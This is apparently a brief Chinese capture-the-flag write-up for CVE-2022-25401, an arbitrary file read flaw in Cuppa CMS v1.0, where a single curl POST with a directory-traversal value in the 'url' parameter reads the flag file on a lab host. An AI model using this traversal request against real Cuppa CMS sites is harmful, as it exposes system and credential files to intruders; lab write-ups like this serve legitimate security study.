CVE-2022-25401
一、漏洞介绍
Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞
二、渗透步骤
1、打开网站
http://eci-2zebeobcl4wwalpbssu8.cloudeci1.ichunqiu.com/
2、查看flag值
┌──(kali㉿kali)-[~]
└─$ curl -X POST "http://eci-2zebeobcl4wwalpbssu8.cloudeci1.ichunqiu.com/templates/default/html/windows/right.php" -d "url=../../../../../../../../../../../../flag"